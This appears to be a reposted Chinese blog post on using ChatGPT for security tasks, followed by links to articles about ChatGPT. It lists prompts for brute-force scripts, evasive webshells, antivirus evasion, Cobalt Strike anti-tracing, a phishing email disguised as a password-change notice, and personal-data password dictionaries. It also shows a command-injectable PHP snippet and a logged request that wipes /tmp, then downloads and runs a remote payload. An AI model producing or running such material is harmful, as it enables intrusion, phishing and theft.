基础入门-ChatGPT结合安全融入技术高效赋能拓展需求

news/2024/4/29 23:57:20/文章来源:https://blog.csdn.net/weixin_53009585/article/details/129643060

文章目录

  • Chatgpt科普
  • 利用:
    • 安全开发
    • 逆向免杀
    • 代码审计
    • 蓝队应急
    • APT社工学
    • 其他相关:

在这里插入图片描述

Chatgpt科普

  1. ChatGPT是什么?

    ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。

  2. ChatGPT能做什么?
    它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。

  3. ChatGPT牛在哪里?
    (1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。
    (2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。

  4. 安全行业影响:
    (1)整合多种恶意软件
    (2)提升漏洞发现能力
    (3)给新手攻击者赋能
    (4)便于社会工程学攻击
    (5)快速筛选和锁定目标
    (6)模拟网络防御攻击技术

利用:

安全开发

1、如何使用Python写一个jwt爆破脚本?
在这里插入图片描述
2、如何使用Python写一个Webshell检测脚本?
3、如何使用Python写一个MS17010漏洞检测脚本?
4、使用PHP开发一个免杀混淆复杂的webshell脚本
5、在渗透测试靶机中,发现PHP脚本被禁用了敏感函数,如何生成一个绕过的webshell

逆向免杀

1、APK使用什么工具进行反编译?
在这里插入图片描述
2、常见脱壳工具有那些?
3、免杀中使用什么加壳效果好?

代码审计

1、下面代码会出现哪些安全漏洞?又该如何利用呢?

<?phpif( isset( $_POST[ 'Submit' ]  ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping  ' . $target );}else {// *nix$cmd = shell_exec( 'ping  -c 4 ' . $target );}// Feedback for the end user$html .= "<pre>{$cmd}</pre>";
}?>

在这里插入图片描述

2、Thinkphp历史漏洞有哪些?
3、shiro反序列化漏洞如何利用?

蓝队应急

0、平台项目:
蓝队针对攻击威胁感知平台项目有哪些?
1、日志分析:
103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”
在这里插入图片描述
2、流量检测:
写一个检测cobaltstrike payload的脚本
写一个Cobalstrike检测rules规则

APT社工学

1、防溯源:Cobaltstike如何防止被溯源
2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知
3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?
在这里插入图片描述

其他相关:

网络安全渗透测试简历模版 早知道前几天投简历就用这个了 emmm
在这里插入图片描述
网络安全渗透测试报告模版

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_14.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于Docker如何快速部署自己的ChatGPT

背景 随着OpenAI在2022年底发布的LLM模型-ChatGPT展现出的强大效果&#xff0c;ChatGPT无疑成为了当下炙手可热的明星模型。 现有的基于GPT的开源项目已经非常多&#xff0c;本文以现有的高热度github开源项目chatgpt-web为例&#xff0c;教大家简单快速地搭建属于自己的Chat…

windows-中科院学术ChatGPT优化安装记录

搭建中科院学术专业版 ChatGPT记录 1、git仓库获取 > git clone https://github.com/binary-husky/chatgpt_academic.git&#xff08;在git bash 中打开输入就行&#xff09; 打开后输入命令即可 然后你便得到了它&#xff0c;进入该文件夹 打开命令终端&#xff0c;为他配…

基于ChatGPT搭建公司内部ChatGPT服务器

一、前言 我是ChatGPT&#xff0c;一个由OpenAI训练的大型语言模型。我被设计用于回答各种问题并生成文本&#xff0c;可以处理多种自然语言任务&#xff0c;例如问答、摘要和翻译等。在我的学习过程中&#xff0c;我阅读了数百万篇文本&#xff0c;并使用这些文本来提高我的理…

赶上ChatGPT的车,百度文心一言和阿里通义千问上线

百度“文心一言”&#xff0c;地址&#xff1a;https://yiyan.baidu.com 阿里“通义千问”&#xff0c;地址&#xff1a;https://tongyi.aliyun.com 以下介绍来自官方&#xff1a; 一、“文心一言”介绍&#xff1a; 你好&#xff0c;我是文心一言 ERNIE Bot 作为一个人工…

ChatGPT火了,将给网络安全行业带来什么影响?

一、简介 作为全新的人工智能&#xff08;AI&#xff09;聊天机器人&#xff0c;ChatGPT被认为正在“掀起新一轮AI革命”。在股市上甚至出现了“ChatGPT概念股”的当下&#xff0c;ChatGPT究竟对于网络安全行业会产生怎样的影响&#xff0c;是值得思考的一个问题。 ChatGPT由…

你的 ChatGPT Not available in your country?教你如何解决

ChatGPT Not available 文章目录ChatGPT Not available问题描述解决方法一解决方法二教程图示方法一方法二相关文章问题描述 如果你使用科学上网却发现自己的页面上显示 OpenAIs services are not available in your country.&#xff0c;你可能会换其他地区&#xff0c;但是换…

一键免费部署你的私人 ChatGPT 网站

Hello&#xff0c;大家好&#xff0c;我是程序员树先生。今天手把手教大家如何“免费”部署一个私人专属的 ChatGPT 网站&#xff0c;即使你不懂编程&#xff0c;跟着本文也可以完成搭建&#xff0c;非常简单。 为什么要部署私人 ChatGPT 网站 &#xff1f; 国内市场上已经有…

ChatGPT国内镜像站,轻松访问

镜像站网址&#xff1a;https://444.chat/ ChatGPT介绍 ChatGPT&#xff0c;全称聊天生成型预训练变换模型&#xff08;英语&#xff1a;Chat Generative Pre-trained Transformer&#xff09;&#xff0c;是OpenAI开发的人工智能聊天机器人程序&#xff0c;于2022年11月推出。…

【AIGC】Notion AI 从注册到体验:如何免费使用

欢迎关注【youcans的AGI学习笔记】原创作品&#xff0c;火热更新中 【AIGC】Notion AI 从注册到体验1. Notion AI 介绍1.1 Notion AI 简介1.2 Notion AI 的核心能力1.3 Notion AI 与 ChatGPT 的比较2. Notion AI 国内用户注册2.1 PC 端用户注册2.2 移动端用户注册3. Notion AI …